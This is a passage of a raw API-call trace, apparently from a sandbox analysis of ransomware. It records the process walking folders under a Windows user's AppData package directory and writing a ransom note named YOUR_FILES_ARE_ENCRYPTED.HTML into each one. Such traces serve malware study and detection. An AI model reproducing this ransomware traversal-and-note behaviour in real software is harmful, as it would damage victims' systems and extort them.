lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AC\\INetCookies\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xf77097c8, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf77097c8, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf77097c8, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x3185198, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0116.729] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xf77097c8, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf77097c8, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf77097c8, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x3185198, cFileName="..", cAlternateFileName="")) returned 1 [0116.729] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xf77097c8, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf77097c8, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf77097c8, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x3185198, cFileName="..", cAlternateFileName="")) returned 0 [0116.729] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0116.729] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 140 [0116.729] GetProcessHeap () returned 0x600000 [0116.729] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.730] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.net.native.runtime.1.0_8wekyb3d8bbwe\\ac\\inetcookies\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0116.730] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0116.731] CloseHandle (hObject=0x320) returned 1 [0116.731] GetProcessHeap () returned 0x600000 [0116.731] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.731] GetProcessHeap () returned 0x600000 [0116.731] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0116.732] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xf77097c8, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf77097c8, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf77097c8, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3185250, dwReserved1=0x3185190, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0116.732] StrStrIW (lpFirst="INetHistory", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.732] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AC\\INetHistory") returned 110 [0116.732] GetProcessHeap () returned 0x600000 [0116.732] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0116.733] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AC\\INetHistory" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AC\\INetHistory") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AC\\INetHistory" [0116.733] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AC\\INetHistory", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AC\\INetHistory\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AC\\INetHistory\\*" [0116.733] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AC\\INetHistory\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xf77097c8, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf77097c8, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf77097c8, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x3185198, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0116.734] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xf77097c8, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf77097c8, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf77097c8, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x3185198, cFileName="..", cAlternateFileName="")) returned 1 [0116.734] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xf77097c8, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf77097c8, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf77097c8, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x3185198, cFileName="..", cAlternateFileName="")) returned 0 [0116.734] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0116.734] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 140 [0116.734] GetProcessHeap () returned 0x600000 [0116.734] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.734] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.net.native.runtime.1.0_8wekyb3d8bbwe\\ac\\inethistory\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0116.735] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0116.736] CloseHandle (hObject=0x320) returned 1 [0116.737] GetProcessHeap () returned 0x600000 [0116.737] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.737] GetProcessHeap () returned 0x600000 [0116.737] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0116.737] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf77097c8, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf77097c8, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf77097c8, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3185250, dwReserved1=0x3185190, cFileName="Temp", cAlternateFileName="")) returned 1 [0116.737] StrStrIW (lpFirst="Temp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.737] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AC\\Temp") returned 103 [0116.738] GetProcessHeap () returned 0x600000 [0116.738] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0116.739] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AC\\Temp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AC\\Temp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AC\\Temp" [0116.739] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AC\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AC\\Temp\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AC\\Temp\\*" [0116.739] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AC\\Temp\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf77097c8, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf77097c8, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf77097c8, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x3185198, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0116.739] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf77097c8, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf77097c8, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf77097c8, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x3185198, cFileName="..", cAlternateFileName="")) returned 1 [0116.739] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf77097c8, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf77097c8, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf77097c8, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x3185198, cFileName="..", cAlternateFileName="")) returned 0 [0116.739] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0116.739] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 133 [0116.739] GetProcessHeap () returned 0x600000 [0116.739] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.739] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.net.native.runtime.1.0_8wekyb3d8bbwe\\ac\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0116.740] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0116.741] CloseHandle (hObject=0x320) returned 1 [0116.741] GetProcessHeap () returned 0x600000 [0116.741] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.741] GetProcessHeap () returned 0x600000 [0116.741] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0116.741] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf77097c8, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf77097c8, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf77097c8, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3185250, dwReserved1=0x3185190, cFileName="Temp", cAlternateFileName="")) returned 0 [0116.741] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0116.741] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 128 [0116.741] GetProcessHeap () returned 0x600000 [0116.741] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.741] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.net.native.runtime.1.0_8wekyb3d8bbwe\\ac\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0116.742] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.743] CloseHandle (hObject=0x214) returned 1 [0116.743] GetProcessHeap () returned 0x600000 [0116.743] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.743] GetProcessHeap () returned 0x600000 [0116.743] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.744] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf76be6af, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf76be6af, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf76be6af, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AppData", cAlternateFileName="")) returned 1 [0116.744] StrStrIW (lpFirst="AppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.744] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AppData") returned 103 [0116.744] GetProcessHeap () returned 0x600000 [0116.744] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.745] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AppData" [0116.745] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AppData\\*" [0116.745] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf76be6af, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf76be6af, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf76be6af, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3185250, dwReserved1=0x3185190, cFileName=".", cAlternateFileName="")) returned 0x6268f8 [0116.745] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf76be6af, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf76be6af, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf76be6af, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3185250, dwReserved1=0x3185190, cFileName="..", cAlternateFileName="")) returned 1 [0116.746] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf76be6af, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf76be6af, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf76be6af, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3185250, dwReserved1=0x3185190, cFileName="..", cAlternateFileName="")) returned 0 [0116.746] FindClose (in: hFindFile=0x6268f8 | out: hFindFile=0x6268f8) returned 1 [0116.746] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 133 [0116.746] GetProcessHeap () returned 0x600000 [0116.746] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.746] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.net.native.runtime.1.0_8wekyb3d8bbwe\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0116.746] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.747] CloseHandle (hObject=0x214) returned 1 [0116.747] GetProcessHeap () returned 0x600000 [0116.747] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.747] GetProcessHeap () returned 0x600000 [0116.748] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.748] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf75ff84b, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf75ff84b, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf75ff84b, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0116.748] StrStrIW (lpFirst="LocalCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.748] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\LocalCache") returned 106 [0116.748] GetProcessHeap () returned 0x600000 [0116.748] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.748] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\LocalCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\LocalCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\LocalCache" [0116.748] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\LocalCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\LocalCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\LocalCache\\*" [0116.748] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Runtime.1.0_8wekyb3d8bbwe\\LocalCache\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf75ff84b, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf75ff84b, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf75ff84b, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3185250, dwReserved1=0x3185190, cFileName=".", cAlternateFileName="")) returned 0x626638 [0116.748] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf75ff84b, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf75ff84b, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf75ff84b, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3185250, dwReserved1=0x3185190, cFileName="..", cAlternateFileName="")) returned 1 [0116.748] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf75ff84b, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf75ff84b, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf75ff84b, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, 